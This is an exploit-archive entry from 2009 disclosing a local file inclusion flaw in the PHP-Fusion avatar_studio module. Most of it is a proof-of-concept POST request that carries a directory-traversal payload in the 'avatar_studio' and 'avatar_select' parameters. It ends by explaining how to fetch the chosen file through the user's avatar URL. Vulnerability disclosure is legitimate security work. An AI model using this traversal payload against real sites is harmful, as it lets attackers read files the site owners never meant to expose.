[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : PHP-Fusion Mod avatar_studio LFI
# Published : 2009-12-30
# Author : bonobug
# Previous Title : XOOPS Module dictionary 2.0.18 (detail.php) SQL Injection Vulnerability
# Next Title : I-Escorts Directory (country_escorts.php country_id) SQL Injection Vulnerability


# Tested on: Spanish version

By modifying "avatar_studio" parameter at POST data at avatar_studio.php you can retrieve all images at that dir.
Also using "avatar_select" you can add yourself a file as avatar which may not be .jpg

Proof of concept:

POST /infusions/avatar_studio/avatar_studio.php HTTP/1.1
...
Headers
...
Content-Length: XX
avatar_studio=../../../../../data&avatar_select=data.txt&avatar_save=Salvar+Avatar <-- (Spanish: 'Save avatar')

If you are trying to access to a non-existent directory it would return a php error.
Else if your file does exist it will load as normal.

When you have modified your avatar you can access to it using your "user id" as:
http://www.xxxxxxxxxxxxx.com/images/avatars/avatar[YOURUSERID].EXTENSION